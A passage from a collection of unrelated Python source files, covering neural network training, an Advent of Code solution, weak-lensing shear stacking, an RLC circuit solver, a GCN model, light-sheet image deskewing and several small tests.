model.add(Dropout(0.5))
model.add(Dense(4, activation='softmax'))
# Adam Optimizer
# Learning rateimiz normalde sabittir. Adam Optimizer kullanarak değiştirebiliyoruz.
optimizer = Adam(lr=0.001, beta_1=0.9, beta_2=0.999)
# loss functionı categorical_crossentropy ile buluyoruz. Eğer yanlış predict ederse loss yüksek, doğru predict ederse loss 0.
model.compile(optimizer=optimizer,
loss='categorical_crossentropy', metrics=['accuracy'])
# Fit the model
hist = model.fit(x_train, y_train, batch_size=8, epochs=50, verbose=1,
validation_data=(x_test, y_test))
# Epoch and Batch Size
# 981 resmimiz var. batch__size = 64 dedim. 981/64 = 15,33 kez batch yaparız.
# Bu da epoch olarak adlandırılır. Her epochta 15,33 kez batch yapıyoruz demek.
# Evaluate model
score = model.evaluate(x_test, y_test)
print('Test accuracy:', score[1])
model.save('main.model')
|
from __future__ import absolute_import
from .suites import NAMED_SUITES
from .loggers import NAMED_LOGGERS
|
from functools import cache
from itertools import product
def parse_data():
with open('2021/21/input.txt') as f:
data = f.read()
return [int(line.rsplit(maxsplit=1)[1]) for line in data.splitlines()]
def part_one(data):
data = data.copy()
scores = [0, 0]
pi = 1
rolls = 0
def roll():
nonlocal rolls
rolls += 1
return (rolls - 1) % 100 + 1
while True:
pi ^= 1
data[pi] += sum(roll() for _ in range(3))
data[pi] = (data[pi] - 1) % 10 + 1
scores[pi] += data[pi]
if scores[pi] >= 1000:
return rolls * scores[pi ^ 1]
def part_two(data):
@cache
def dirac_dice(p1, p2, s1=0, s2=0):
wins = [0, 0]
for rolls in product((1, 2, 3), repeat=3):
new_p1 = (p1 + sum(rolls) - 1) % 10 + 1
new_s1 = s1 + new_p1
if new_s1 >= 21:
wins[0] += 1
else:
dp2, dp1 = dirac_dice(p2, new_p1, s2, new_s1)
wins[0] += dp1
wins[1] += dp2
return wins
return max(dirac_dice(*data.copy()))
def main():
data = parse_data()
print(f'Day 21 Part 01: {part_one(data)}')
print(f'Day 21 Part 02: {part_two(data)}')
|
class Moon:
def __init__(self, x, y, z):
self.position = [x, y, z]
self.velocity = [0, 0, 0]
def update_velocity(self, other):
for i in range(3):
self.update_velocity_for_axe(other, i)
def update_velocity_for_axe(self, other, axe):
if self.position[axe] < other.position[axe]:
self.velocity[axe] += 1
elif self.position[axe] > other.position[axe]:
self.velocity[axe] -= 1
else:
pass
def move(self):
for i in range(3):
self.move_axe(i)
def move_axe(self, axe):
self.position[axe] += self.velocity[axe]
def get_energy(self):
return sum([abs(i) for i in self.position]) * sum(
[abs(i) for i in self.velocity]
)
def __repr__(self):
return "pos<x=%4d, y=%4d, z=%4d>, vel<x=%4d, y=%4d, z=%4d>" % (
*self.position,
*self.velocity,
)
def __eq__(self, other):
return self.position == other.position and self.velocity == other.velocity
def get_info(self, axe):
return (self.position[axe], self.velocity[axe])
|
#!/bin/env python
import fitsio, numpy as np, json
import esutil as eu
from shear_stacking import *
from sys import argv
from multiprocessing import Pool, current_process, cpu_count
from glob import glob
import pylab as plt
def getValues(s, key, functions):
# what values are used for the slices: functions are direct columns?
if key in functions.keys():
return eval(functions[key])
else:
return s[key]
def getSliceMask(values, lower, upper, return_num=False):
if return_num is False:
return (values >= lower) & (values < upper)
else:
return sum((values >= lower) & (values < upper))
def getQuadrantMask(lens, shapes, config):
quad_flags = lens['quad_flags']
# no quadrant pairs OK
if quad_flags <= 1:
return np.array([], dtype='bool')
# all OK
if quad_flags == (2**0 + 2**1 + 2**2 + 2**3 + 2**4):
return np.ones(shapes.size, dtype='bool')
# not all quadrant pairs are OK
# FIXME: needs to be defined from angles on the curved sky
# NOTE: very restrictive due to strict ordering of quadrants
# e.g. if all sources are in the top half, but quad_flags & 2 > 0,
# then no source will be selected even if quad_flags & 8 > 0
if quad_flags & 2 > 0:
return shapes[config['shape_dec_key']] > lens[config['lens_dec_key']]
if quad_flags & 4 > 0:
return shapes[config['shape_ra_key']] < lens[config['lens_ra_key']]
if quad_flags & 8 > 0:
return shapes[config['shape_dec_key']] < lens[config['lens_dec_key']]
if quad_flags & 16 > 0:
return shapes[config['shape_ra_key']] > lens[config['lens_ra_key']]
def createProfile(config):
n_jack = config['n_jack']
l = config['minrange']
u = config['maxrange']
n_bins = config['n_bins']
bin_type = config['bin_type']
if bin_type == "linear":
bins = np.linspace(l, u, n_bins+1)
elif bin_type == "log":
dlogx = (np.log(u) - np.log(l))/n_bins
bins = np.exp(np.log(l) + dlogx * np.arange(n_bins+1))
else:
raise NotImplementedError("bin_type %s not in ['linear', 'log']" % bin_type)
# create profile for all data and for each slice defined
pnames = ['all']
for key, limit in config['splittings'].iteritems():
for s in xrange(len(limit)-1):
pnames.append("%s_%d" % (key, s))
profile = {}
# each slice get a binned profile for all data and each jackknife region
for pname in pnames:
profile[pname] = [BinnedScalarProfile(bins) for i in xrange(n_jack + 1)]
return profile
# BinnedScalarProfile has a += operator, so we just have to call this for
# each slices/jackknifed profile
def appendToProfile(profile, profile_):
for pname in profile.keys():
for i in xrange(len(profile[pname])):
profile[pname][i] += profile_[pname][i]
def insertIntoProfile(profile, pname, R, Q, W, S, region=-1, mask=None):
if mask is None:
for i in xrange(len(profile[pname])):
if i != region:
profile[pname][i].insert(R, Q, W, S=S)
else:
for i in xrange(len(profile[pname])):
if i != region:
if S is not None:
profile[pname][i].insert(R[mask], Q[mask], W[mask], S=S[mask])
else:
profile[pname][i].insert(R[mask], Q[mask], W[mask], S=S)
def getShearValues(shapes_lens, lens, config):
global wz1, wz2
# compute tangential shear
gt = tangentialShear(shapes_lens[config['shape_ra_key']], shapes_lens[config['shape_dec_key']], getValues(shapes_lens, config['shape_e1_key'], config['functions']), getValues(shapes_lens, config['shape_e2_key'], config['functions']), lens[config['lens_ra_key']], lens[config['lens_dec_key']], computeB=False)
# compute DeltaSigma from source redshift
# we use DeltaSigma = wz2 * wz1**-1 < gt> / (wz2 <s>),
# where wz1 and wz2 are the effective inverse Sigma_crit
# weights at given lens z
"""W = getValues(shapes_lens, config['shape_weight_key'], config['functions'])
z_l = getValues(lens, config['lens_z_key'], config['functions'])
z_s = getValues(shapes_lens, config['shape_z_key'], config['functions'])
Sigma_crit = getSigmaCrit(z_l, z_s)
mask = z_s > z_l
gt[mask] *= Sigma_crit[mask]**-1
W[mask] *= Sigma_crit[mask]**-2
W[mask == False] = 0
"""
# compute sensitivity and weights: with the photo-z bins,
# the precomputed wz1 already contains the measurement weights,
# we just need to apply the effective Sigma_crit to gt and
# replace W with wz1**2 (dropping the measurement weight which would otherwise
# be counted twice).
# See Sheldon et al., 2004, AJ, 127, 2544 (eq. 19)
W = np.zeros(gt.size) # better safe than sorry
zs_bin = getValues(shapes_lens, config['shape_z_key'], config['functions'])
for b in np.unique(zs_bin):
wz1_ = extrap(lens[config['lens_z_key']], wz1['z'], wz1['bin%d' % b])
mask = zs_bin == b
gt[mask] /= wz1_
W[mask] = wz1_**2
S = getValues(shapes_lens, config['shape_sensitivity_key'], config['functions'])
return gt, W, S
def stackShapes(shapes, lenses, profile_type, config, regions):
chunk_size = config['shape_chunk_size']
shapefile = config['shape_file']
thread_id = current_process()._identity
basename = os.path.basename(shapefile)
basename = ".".join(basename.split(".")[:-1])
matchfile = '/tmp/' + basename + '_matches_%d.bin' % thread_id
# do we have the column for the quadrant check?
do_quadrant_check = 'quad_flags' in lenses.dtype.names
# find all galaxies in shape catalog within maxrange arcmin
# of each lens center
maxrange = float(config['maxrange'])
if config['coords'] == "physical":
maxrange = Dist2Ang(maxrange, lenses[config['lens_z_key']])
h = eu.htm.HTM(8)
matchfile = matchfile.encode('ascii') # htm.match expects ascii filenames
h.match(lenses[config['lens_ra_key']], lenses[config['lens_dec_key']], shapes[config['shape_ra_key']], shapes[config['shape_dec_key']], maxrange, maxmatch=-1, file=matchfile)
htmf = HTMFile(matchfile)
Nmatch = htmf.n_matches
# profile container
profile = createProfile(config)
if Nmatch:
# iterate over all lenses, write scalar value, r, weight into file
for m1, m2, d12 in htmf.matches():
lens = lenses[m1]
region = regions[m1]
shapes_lens = shapes[m2]
# check which sources around a lens we can use
if do_quadrant_check:
mask = getQuadrantMask(lens, shapes_lens, config)
shapes_lens = shapes_lens[mask]
d12 = np.array(d12)[mask]
del mask
n_gal = shapes_lens.size
if n_gal:
# define the profile quantities: radius, q, weight, sensitivity
if config['coords'] == "physical":
R = Ang2Dist(d12, lens[config['lens_z_key']])
else:
R = np.array(d12)
if profile_type == "scalar":
Q = getValues(shapes_lens, config['shape_scalar_key'], config['functions'])
W = getValues(shapes_lens, config['shape_weight_key'], config['functions'])
S = None
if profile_type == "shear":
Q, W, S = getShearValues(shapes_lens, lens, config)
# save unsliced profile first
insertIntoProfile(profile, 'all', R, Q, W, S, region=region)
# find out in which slice each pair falls
for key, limit in config['splittings'].iteritems():
if config['split_type'] == 'shape':
values = getValues(shapes_lens, key, config['functions'])
for s in xrange(len(limit)-1):
pname = "%s_%d" % (key, s)
mask = getSliceMask(values, limit[s], limit[s+1])
insertIntoProfile(profile, pname, R, Q, W, S, region=region, mask=mask)
del mask
del values
elif config['split_type'] == 'lens':
value = getValues(lens, key, config['functions'])
for s in xrange(len(limit)-1):
pname = "%s_%d" % (key, s)
# each lens can only be in one slice per key
if getSliceMask(value, limit[s], limit[s+1]):
mask = None
insertIntoProfile(profile, pname, R, Q, W, S, region=region, mask=mask)
break
del shapes_lens, R, Q, W, S
# finish up
os.system('rm ' + matchfile)
return profile
def getJackknifeRegions(config, lenses, outdir):
# if jacknife errors are desired: create jackknife regions from
# the lens file by k-means clustering and assign each lens
# to the nearest k-means center
# If reuse_jack is specified: reload previously generated centers
# to use fixed regions
if config['n_jack']:
n_jack = config['n_jack']
import kmeans_radec
jack_file = outdir + "n_jack/km_centers.npy"
radec = np.dstack((lenses[config['lens_ra_key']], lenses[config['lens_dec_key']]))[0]
if not os.path.exists(jack_file):
print "defining %d jackknife regions" % n_jack
maxiter = 100
tol = 1.0e-5
km = kmeans_radec.kmeans_sample(radec, n_jack, maxiter=maxiter, tol=tol)
if not km.converged:
raise RuntimeError("k means did not converge")
# save result for later
try:
os.makedirs(outdir + "n_jack")
except OSError:
pass
np.save(jack_file, km.centers)
else:
print "reusing jackknife regions from " + jack_file
centers_ = np.load(jack_file)
km = kmeans_radec.KMeans(centers_)
# define regions: ids of lenses assigned to each k-means cluster
regions = km.find_nearest(radec)
else:
# do not use regions: -1 will never be selected for jackknifes
regions = -1 * np.ones(len(lenses), dtype='int8')
return regions
def computeMeanStdForProfile(profile):
n_jack = len(profile)-1
# use build-in method to calculate in-bin means and dispersions
if n_jack == 0:
mean_r, n, mean_q, std_q, sum_w = profile.getProfile()
mask = (n>0)
return {"mean_r": mean_r[mask], "n": n[mask], "mean_q": mean_q[mask], "std_q": std_q[mask], "sum_w": sum_w[mask]}
else: # jackknife
q = []
missing = []
for i in xrange(n_jack):
r_, n_, q_, std_q, sum_w = profile[i].getProfile()
missing.append(n_ == 0)
q.append(q_)
missing = np.array(missing)
q = np.ma.masked_array(q, mask=missing)
mean_q = q.mean(axis=0)
# result for normal/non-jackknife profile
mean_r, n, mean0, std_q, sum_w = profile[-1].getProfile()
mask = (n>0)
# variance and bias-corrected mean needs number of actual jackknifes:
# to be corrected for available data in each radial bin
n_avail = n_jack - missing.sum(axis=0)
mean_q = n_avail*mean0 - (n_avail - 1)*mean_q
std_q = ((n_avail - 1.)/n_avail * ((q - mean_q)**2).sum(axis=0))**0.5
return {"mean_r": mean_r[mask], "n": n[mask], "mean_q": mean_q.data[mask], "std_q": std_q.data[mask], "sum_w": sum_w[mask]}
def collapseJackknifes(profile):
for pname in profile.keys():
profile[pname] = computeMeanStdForProfile(profile[pname])
if __name__ == '__main__':
# parse inputs
try:
configfile = argv[1]
profile_type = argv[2]
except IndexError:
print "usage: " + argv[0] + " <config file> <shear/scalar>"
raise SystemExit
try:
fp = open(configfile)
print "opening configfile " + configfile
config = json.load(fp)
fp.close()
except IOError:
print "configfile " + configfile + " does not exist!"
raise SystemExit
if profile_type not in ['shear', 'scalar']:
print "specify profile_type from ['shear', 'scalar']"
raise SystemExit
if config['coords'] not in ['angular', 'physical']:
print "config: specify either 'angular' or 'physical' coordinates"
raise SystemExit
outdir = os.path.dirname(configfile) + "/"
if profile_type == "shear":
name = "shear_"
if profile_type == "scalar":
name = "scalar_" + config['shape_scalar_key'] + "_"
profile_files = outdir + name + '*.npz'
# only do something if there are no profiles present
if len(glob(profile_files)) == 0:
# open shape catalog
shapes_all = getShapeCatalog(config, verbose=True)
if shapes_all.size == 0:
print "Shape catalog empty"
raise SystemExit
# open lens catalog
lenses = getLensCatalog(config, verbose=True)
if lenses.size == 0:
print "Lens catalog empty"
raise SystemExit
# container to hold profiles
profile = createProfile(config)
# get the jackknife regions (if specified in config)
regions = getJackknifeRegions(config, lenses, outdir)
# load lensing weights (w * Sigma_crit ^-1 or -2) for shear profiles
if profile_type == "shear":
wz1 = getWZ(power=1)
# cut into manageable junks and distribute over cpus
print "running lens-source stacking ..."
n_processes = cpu_count()
pool = Pool(processes=n_processes)
chunk_size = config['shape_chunk_size']
splits = len(shapes_all)/chunk_size
if len(shapes_all) % chunk_size != 0:
splits += 1
results = [pool.apply_async(stackShapes, (shapes_all[i*chunk_size: (i+1)*chunk_size], lenses, profile_type, config, regions)) for i in range(splits)]
j = 0
for r in results:
profile_ = r.get()
appendToProfile(profile, profile_)
r, n, mean_q, std_q, sum_w = profile['all'][-1].getProfile()
print " job %d/%d (n_pairs = %.3fe9) done" % (j, splits, n.sum() / 1e9)
j+=1
# save jackknife region results
if config['n_jack']:
print "saving jackknife profiles..."
for pname in profile.keys():
for i in xrange(len(profile[pname])):
filename = outdir + 'n_jack/' + name + pname + '_%d.npz' % i
profile[pname][i].save(filename)
# collapse jackknifes into means and stds
print "aggregating results..."
collapseJackknifes(profile)
# save profiles
for pname in profile.keys():
filename = outdir + name + pname + '.npz'
print "writing " + filename
np.savez(filename, **(profile[pname]))
# print all profile to stdout
p = profile['all']
print "\nALL profile:"
print "{0:>8s} | {1:>12s} | {2:>12s} | {3:>12s} +- {4:>12s}".format("RADIUS", "NUMBER", "SUM(W)/AREA", "MEAN", "STD")
print "-" * 70
for i in xrange(len(p['n'])):
print "{0:8.2f} | {1:12g} | {2:12g} | {3:12g} +- {4:12g}".format(p['mean_r'][i], p['n'][i], p['sum_w'][i], p['mean_q'][i], p['std_q'][i])
else:
print "Profiles " + profile_files + " already exist."
|
from simit_services.celery import app
from django.core.mail import EmailMultiAlternatives
from django.template.loader import render_to_string
@app.task
def asinc_mail(list_emails=[], subject='NO SUBJECT', template=None, content_data=None):
sender = "SIMIT SERVICES <[email protected]>"
merge_data = content_data
text_body = render_to_string("../templates/"+template+".txt", merge_data)
html_body = render_to_string("../templates/"+template+".html", merge_data)
msg = EmailMultiAlternatives(subject=subject, from_email=sender,
to=list_emails, body=text_body)
msg.attach_alternative(html_body, "text/html")
msg.send()
|
import numpy
import matplotlib.pyplot as plt
from decimal import Decimal
from scipy import integrate
from scipy.interpolate import InterpolatedUnivariateSpline
# одномерная кусочно-линейная интерполяция функции, которая задана точками (xp, fp).
# Table1
masI = [0.5, 1, 5, 10, 50, 200, 400, 800, 1200]
masT0 = [6400, 6790, 7150, 7270, 8010, 9185, 10010, 11140, 12010]
masm = [0.4, 0.55, 1.7, 3, 11, 32, 40, 41, 39]
# Table2
masT = [4000, 5000, 6000, 7000, 8000, 9000, 10000, 11000, 12000, 13000, 14000]
masSigm = [0.031, 0.27, 2.05, 6.06, 12.0,
19.9, 29.6, 41.1, 54.1, 67.7, 81.5]
# x - t время
# y - I ток
# z - Uc напряжение
# f - dI/dt
# phi - dU/dt
def interpolate(x, masX, masY):
order = 1
s = InterpolatedUnivariateSpline(masX, masY, k=order)
return float(s(x))
def T(z):
return (Tw - T0) * z**m + T0
def sigma(T):
return interpolate(T, masT, masSigm)
def Rp(I):
global m
global T0
m = interpolate(I, masI, masm)
T0 = interpolate(I, masI, masT0)
def func(z): return sigma(T(z)) * z
integral = integrate.quad(func, 0, 1)
Rp = le/(2 * numpy.pi * R**2 * integral[0])
return Rp
def f(xn, yn, zn):
return -((Rk + m_Rp_global) * yn - zn)/Lk
def phi(xn, yn, zn):
return -yn/Ck
def second_order(xn, yn, zn, hn, m_Rp):
global m_Rp_global
m_Rp_global = m_Rp
alpha = 0.5
yn_1 = yn + hn * ((1 - alpha) * f(xn, yn, zn) + alpha
* f(xn + hn/(2*alpha),
yn + hn/(2*alpha) * f(xn, yn, zn),
zn + hn/(2*alpha) * phi(xn, yn, zn)))
zn_1 = zn + hn * ((1 - alpha) * phi(xn, yn, zn) + alpha
* phi(xn + hn/(2*alpha),
yn + hn/(2*alpha) * f(xn, yn, zn),
zn + hn/(2*alpha) * phi(xn, yn, zn)))
return yn_1, zn_1
def fourth_order(xn, yn, zn, hn, m_Rp):
global m_Rp_global
m_Rp_global = m_Rp
k1 = hn * f(xn, yn, zn)
q1 = hn * phi(xn, yn, zn)
k2 = hn * f(xn + hn/2, yn + k1/2, zn + q1/2)
q2 = hn * phi(xn + hn/2, yn + k1/2, zn + q1/2)
k3 = hn * f(xn + hn/2, yn + k2/2, zn + q2/2)
q3 = hn * phi(xn + hn/2, yn + k2/2, zn + q2/2)
k4 = hn * f(xn + hn, yn + k3, zn + q3)
q4 = hn * phi(xn + hn, yn + k3, zn + q3)
yn_1 = yn + (k1 + 2*k2 + 2*k3 + k4)/6
zn_1 = zn + (q1 + 2*q2 + 2*q3 + q4)/6
return yn_1, zn_1
def do_plot(pltMasT, mas1, mas2, xlabel, ylabel, name1, name2):
plt.plot(pltMasT, mas1)
plt.plot(pltMasT, mas2)
plt.xlabel(xlabel)
plt.ylabel(ylabel)
plt.legend((name1, name2))
plt.grid(True)
plt.show()
if __name__ == "__main__":
R = 0.35
Tw = 2000.0
Ck = 268e-6
Lk = 187e-6
Rk = 0.25 # от 0.5 до 200
Uc0 = 1400.0
I0 = 0.5 # от 0.5 до 3
le = 12.0
I4 = I0
Uc4 = Uc0
I2 = I0
Uc2 = Uc0
T0 = 0.0
m = 0.0
pltMasTzero = []
pltMasT = []
pltMasI4 = []
pltMasU4 = []
pltMasRp4 = []
pltMasI2 = []
pltMasU2 = []
pltMasRp2 = []
h = 1e-5
for t in numpy.arange(0, 0.0006, h):
try:
m_Rp4 = Rp(I4)
m_Rp2 = Rp(I2)
if t > h:
pltMasT.append(t)
pltMasTzero.append(T0)
pltMasI4.append(I4)
pltMasU4.append(Uc4)
pltMasRp4.append(m_Rp4)
pltMasI2.append(I2)
pltMasU2.append(Uc2)
pltMasRp2.append(m_Rp2)
I4, Uc4 = fourth_order(t, I4, Uc4, h, m_Rp4)
I2, Uc2 = second_order(t, I2, Uc2, h, m_Rp2)
except:
break
do_plot(pltMasT, pltMasI4, pltMasI2, 't', 'I', '4th order', '2nd order')
do_plot(pltMasT, pltMasU4, pltMasU2, 't', 'Uc', '4th order', '2nd order')
do_plot(pltMasT, pltMasRp4, pltMasRp2, 't', 'Rp', '4th order', '2nd order')
for i in range(len(pltMasI4)):
pltMasI4[i] *= pltMasRp4[i]
pltMasI2[i] *= pltMasRp2[i]
do_plot(pltMasT, pltMasI4, pltMasI2, 't', 'Up', '4th order', '2nd order')
do_plot(pltMasTzero, pltMasI4, pltMasI2, 't', 'T0', '4th order', '2nd order')
|
class DataRow(dict):
"""object for holding row of data"""
def __init__(self, *args, **kwargs):
"""creates instance of DataRow"""
super(DataRow, self).__init__(*args, **kwargs)
self.target_table = None
def row_values(self, field_names, default_value=None):
"""returns row value of specified field_names"""
return tuple(self.get(field_name, default_value) for field_name in field_names)
def set_target_table(self, target_table):
"""sets target table attribute"""
self.target_table = target_table
def get_target_table(self):
"""returns target table attribute"""
return self.target_table
class DataTable(object):
"""object for holding data"""
def __init__(self, data, keys=None):
"""instantiates Table object with rows(which should be a list of dictionaries)"""
self.rows = list(data)
#set keys as _keys of first row by default
if keys:
self._keys = keys
else:
self._keys = list(self.rows[0].keys())
def keys(self):
"""returns keys of Table"""
return self._keys
def append_row(self, row):
"""adds another row to table"""
self.rows.append(row)
def iterrows(self, field_names, default_value=None):
"""generator that yields specified fields for each row"""
for row in self.rows:
yield tuple(row.get(field_name, default_value) for field_name in field_names)
|
import unittest
from daps.utils.video import count_frames, duration, frame_rate
class test_video(unittest.TestCase):
def setUp(self):
self.video = 'data/videos/example.mp4'
self.video_dir = 'data/videos/example'
def test_count_frames(self):
filename = 'not_existent_video.avi'
assert count_frames(filename) == 0
assert count_frames(self.video_dir, method='dir') == 1507
assert count_frames(self.video) == 1507
assert count_frames(self.video, 'ffprobe') == 1507
@unittest.skip("A contribution is required")
def test_dump_frames(self):
pass
def test_duration(self):
assert isinstance(duration(self.video), float)
assert duration('nonexistent.video') == 0.0
@unittest.skip("A contribution is required")
def get_clip(self):
pass
def test_frame_rate(self):
assert isinstance(frame_rate(self.video), float)
assert frame_rate('nonexistent.video') == 0.0
|
import numpy
print("Hello World 4") |
import torch.nn as nn
import torch.nn.functional as F
from torch.optim import Adam
from torch_geometric.nn import GCNConv
from datasets import get_planetoid_dataset
class GCN(nn.Module):
def __init__(self, dataset, nhid, dropout):
super(GCN, self).__init__()
self.gc1 = GCNConv(dataset.num_features, nhid)
self.gc2 = GCNConv(nhid, dataset.num_classes)
self.dropout = dropout
def reset_parameters(self):
self.gc1.reset_parameters()
self.gc2.reset_parameters()
def forward(self, data):
x, edge_index = data.x, data.edge_index
x = F.dropout(x, p=self.dropout, training=self.training)
x = self.gc1(x, edge_index)
x = F.relu(x)
x = F.dropout(x, p=self.dropout, training=self.training)
x = self.gc2(x, edge_index)
return F.log_softmax(x, dim=1)
def create_gcn_model(data_name, nhid=16, dropout=0.5,
lr=0.01, weight_decay=5e-4):
dataset = get_planetoid_dataset(data_name, True)
model = GCN(dataset, nhid, dropout)
optimizer = Adam(model.parameters(), lr=lr, weight_decay=weight_decay)
return dataset, model, optimizer
|
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from traitlets import Bool, Tuple, List
from .utils import setup, teardown
from ..widget import Widget
# A widget with simple traits
class SimpleWidget(Widget):
a = Bool().tag(sync=True)
b = Tuple(Bool(), Bool(), Bool(), default_value=(False, False, False)).tag(sync=True)
c = List(Bool()).tag(sync=True)
def test_empty_send_state():
w = SimpleWidget()
w.send_state([])
assert w.comm.messages == []
def test_empty_hold_sync():
w = SimpleWidget()
with w.hold_sync():
pass
assert w.comm.messages == []
|
"""
probabilistic bit flip noise
"""
from qulacs import Observable
from qulacs import QuantumState, QuantumCircuit
from qulacs.gate import Probabilistic, X
import matplotlib.pyplot as plt
obs = Observable(1)
obs.add_operator(1, "Z 0")
state = QuantumState(1)
circuit = QuantumCircuit(1)
p = 0.1 # probability of bit flip
n_circuit_sample = 10000
n_depth = 20 # the number of probabilistic gate
probabilistic_pauli_gate = Probabilistic([p],[X(0)]) #define probabilistic gate
circuit.add_gate(probabilistic_pauli_gate) # add the prob. gate to the circuit
exp_array = []
for depth in range(n_depth):
exp = 0
for i in [0]*n_circuit_sample:
state.set_zero_state()
for _ in range(depth):
circuit.update_quantum_state(state) # apply the prob. gate
exp += obs.get_expectation_value(state) # get expectation value for one sample of circuit
exp /= n_circuit_sample # get overall average
exp_array.append(exp)
#plot
plt.plot(range(n_depth), exp_array)
plt.show() |
import unittest
from BaseTest import BaseTest
class Test_goService(BaseTest):
GO_SERVICE_URL = "http://localhost:3000/health"
def test_goService(self):
self.isBackendAlive(self.GO_SERVICE_URL, "go service")
if __name__ == '__main__':
unittest.main()
|
import math
import numpy
from dexp.utils import xpArray
from dexp.utils.backends import Backend, NumpyBackend
def yang_deskew(
image: xpArray,
depth_axis: int,
lateral_axis: int,
flip_depth_axis: bool,
dx: float,
dz: float,
angle: float,
camera_orientation: int = 0,
num_split: int = 4,
internal_dtype=None,
):
"""'Yang' Deskewing as done in Yang et al. 2019 ( https://www.biorxiv.org/content/10.1101/2020.09.22.309229v2 )
Parameters
----------
image : input image (skewed 3D stack)
depth_axis : Depth axis.
lateral_axis : Lateral axis.
flip_depth_axis : Flips image to deskew in the opposite orientation (True for view 0 and False for view 1)
dz : float, scanning step (stage or galvo scanning step, not the same as the distance between the slices)
dx : float, pixel size of the camera
angle : float, incident angle of the light sheet, angle between the light sheet and the optical axis in degrees
camera_orientation : Camera orientation correction expressed
as a number of 90 deg rotations to be performed per 2D image in stack.
num_split : number of splits to break down the data into pieces (along y, axis=2) to fit into the memory of GPU
internal_dtype : internal dtype to perform computation
Returns
-------
Deskewed image
"""
# compute dimensionless parameters:
xres = dx * math.cos(angle * math.pi / 180)
resample_factor = int(round(dz / xres))
lateral_scaling = xres / dx
image = yang_deskew_dimensionless(
image=image,
depth_axis=depth_axis,
lateral_axis=lateral_axis,
flip_depth_axis=flip_depth_axis,
resample_factor=resample_factor,
lateral_scaling=lateral_scaling,
camera_orientation=camera_orientation,
num_split=num_split,
internal_dtype=internal_dtype,
)
return image
def yang_deskew_dimensionless(
image: xpArray,
depth_axis: int,
lateral_axis: int,
flip_depth_axis: bool,
resample_factor: int,
lateral_scaling: float,
camera_orientation: int = 0,
num_split: int = 4,
internal_dtype=None,
):
"""'Yang' Deskewing as done in Yang et al. 2019 ( https://www.biorxiv.org/content/10.1101/2020.09.22.309229v2 )
Parameters
----------
image : input image (skewed 3D stack)
depth_axis : Depth axis.
lateral_axis : Lateral axis.
flip_depth_axis : Flips image to deskew in the opposite orientation (True for view 0 and False for view 1)
resample_factor : Resampling factor
lateral_scaling : Lateral scaling
camera_orientation : Camera orientation correction expressed as a
number of 90 deg rotations to be performed per 2D image in stack.
num_split : number of splits to break down the data into pieces (along y, axis=2) to fit into the memory of GPU
internal_dtype : internal dtype to perform computation
Returns
-------
Deskewed image
"""
# we don't want to move the image to the backend just now,
# as it might be a very large image and we can actually defer moving it to the backend as
# after splitting...
xp = Backend.get_xp_module(image)
# We save the original dtype:
original_dtype = image.dtype
# Default internal dtype is the same as the input image:
if internal_dtype is None:
internal_dtype = image.dtype
# Numpy backend does not support float16:
if type(Backend.current()) is NumpyBackend and internal_dtype == xp.float16:
internal_dtype = xp.float32
# First we compute the permutation that will reorder the axis so that the depth and
# lateral axis are the first axis in the image:
permutation = (depth_axis, lateral_axis) + tuple(
axis for axis in range(image.ndim) if axis not in [depth_axis, lateral_axis]
)
permutation = numpy.asarray(permutation)
inverse_permutation = numpy.argsort(permutation)
# We apply the permutation:
image = xp.transpose(image, axes=permutation)
if flip_depth_axis:
image = xp.flip(image, axis=0)
# rotate the data
# Note: the weird 1+co mod 4 is due to the fact that Bin's original
# code was implemented for a different orientation...
image = xp.rot90(image, k=(1 + camera_orientation) % 4, axes=(1, 2))
# deskew and rotate
image = _resampling_vertical_split(
image,
resample_factor=resample_factor,
lateral_scaling=lateral_scaling,
num_split=num_split,
internal_dtype=internal_dtype,
)
# flip along axis x
if flip_depth_axis:
xp = Backend.get_xp_module(image)
# _resampling_vertical_split transposes axis 0 with axis 2, so we flip along 2:
image = xp.flip(image, axis=2)
# We apply the inverse permutation:
image = xp.transpose(image, axes=inverse_permutation)
# Cast back to original dtype:
image = image.astype(original_dtype, copy=False)
return image
def _resampling_vertical_split(
image, resample_factor: int, lateral_scaling: float, num_split: int = 4, internal_dtype=None
):
"""Same as resampling_vertical but splits the input image so that computation can fit in GPU memory.
Parameters
----------
image : input image (skewed 3D stack)
resample_factor : Resampling factor
lateral_scaling : Lateral scaling
internal_dtype : internal dtype to perform computation
Returns
-------
Resampled image.
Important note: for scalability reasons, the returned image is always numpy image.
"""
if num_split == 1:
output = _resampling_vertical(
image, resample_factor=resample_factor, lateral_scaling=lateral_scaling, internal_dtype=internal_dtype
)
else:
xp = Backend.get_xp_module(image)
data_gpu_splits = xp.array_split(image, num_split, axis=1)
data_cpu_splits = []
for k in range(num_split):
data_resampled = _resampling_vertical(
data_gpu_splits[k],
resample_factor=resample_factor,
lateral_scaling=lateral_scaling,
internal_dtype=internal_dtype,
)
data_cpu_splits.append(Backend.to_numpy(data_resampled, dtype=image.dtype))
output = numpy.concatenate(data_cpu_splits, axis=1)
return output
def _resampling_vertical(image, resample_factor: int, lateral_scaling: float, internal_dtype=None):
"""Resampling of the image by interpolation along vertical direction.
Here we assume the dz is integer multiple of dx * cos(angle * pi / 180),
one can also pre-interpolate the data within along the z' axis if this is not the case
Parameters
----------
image : input image (skewed 3D stack)
resample_factor : Resampling factor
lateral_scaling : Lateral scaling
internal_dtype : internal dtype to perform computation
Returns
-------
Resampled image
"""
xp = Backend.get_xp_module()
sp = Backend.get_sp_module()
# Move images to backend.
image = Backend.to_backend(image, dtype=internal_dtype)
(nz, ny, nx) = image.shape
dtype = image.dtype
nz_new, ny_new, nx_new = len(range(0, nx, resample_factor)), ny, nx + nz * resample_factor
data_reassign = xp.zeros((nz_new, ny_new, nx_new), internal_dtype)
for x in range(nx):
x_start = x
x_end = nz * resample_factor + x
data_reassign[x // resample_factor, :, x_start:x_end:resample_factor] = image[:, :, x].T
del image
# rescale the data, interpolate along z
data_rescale = sp.ndimage.zoom(data_reassign, zoom=(resample_factor, 1, 1), order=1)
del data_reassign
data_interp = xp.zeros((nz_new, ny_new, nx_new), dtype)
for z in range(nz_new):
for k in range(resample_factor):
data_interp[z, :, k::resample_factor] = data_rescale[z * resample_factor - k, :, k::resample_factor]
del data_rescale
# rescale the data, to have voxel the same along x an y;
# remove the first z slice which has artifacts due to resampling
image_final = sp.ndimage.zoom(data_interp[1:], zoom=(1, 1, lateral_scaling), order=1)
return image_final
|
import os
import argparse
import cv
import sys
global inputParser # just a reminder, it's used as a global variable
global inputArgs # just a reminder, it's used as a global variable
def parseInput() :
global inputParser
global inputArgs
